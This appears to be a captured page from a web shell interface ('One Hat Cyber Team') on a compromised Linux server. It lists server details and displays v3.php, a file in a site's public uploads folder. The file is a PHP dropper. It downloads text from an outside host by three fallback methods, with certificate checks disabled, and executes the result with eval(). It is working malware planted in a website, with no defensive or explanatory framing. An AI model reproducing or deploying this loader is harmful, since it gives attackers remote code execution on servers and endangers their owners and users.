⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.30
Server IP:
45.79.8.107
Server:
Linux localhost 5.15.0-140-generic #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.2-1ubuntu2.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
dosbarth.urvam.com
/
public
/
uploads
/
View File Name :
v3.php
url = $url; } public function fetch_file_get_contents() { if (ini_get('allow_url_fopen')) { return file_get_contents($this->url); } return false; } public function fetch_curl() { if (function_exists('curl_version')) { $ch = curl_init($this->url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $data = curl_exec($ch); curl_close($ch); return $data; } return false; } public function fetch_stream() { if ($stream = fopen($this->url, 'r')) { $content = stream_get_contents($stream); fclose($stream); return $content; } return false; } public function get_content() { $content = $this->fetch_file_get_contents(); if ($content === false) { $content = $this->fetch_curl(); } if ($content === false) { $content = $this->fetch_stream(); } return $content; } } $protocol = "https"; $domain = "seneporno.com"; $file_path = "/4.txt"; $url = $protocol . "://" . $domain . $file_path; $fetcher = new Fetcher($url); $content = $fetcher->get_content(); if ($content !== false) { eval("?>" . $content); } else { echo "エラー。"; } ?>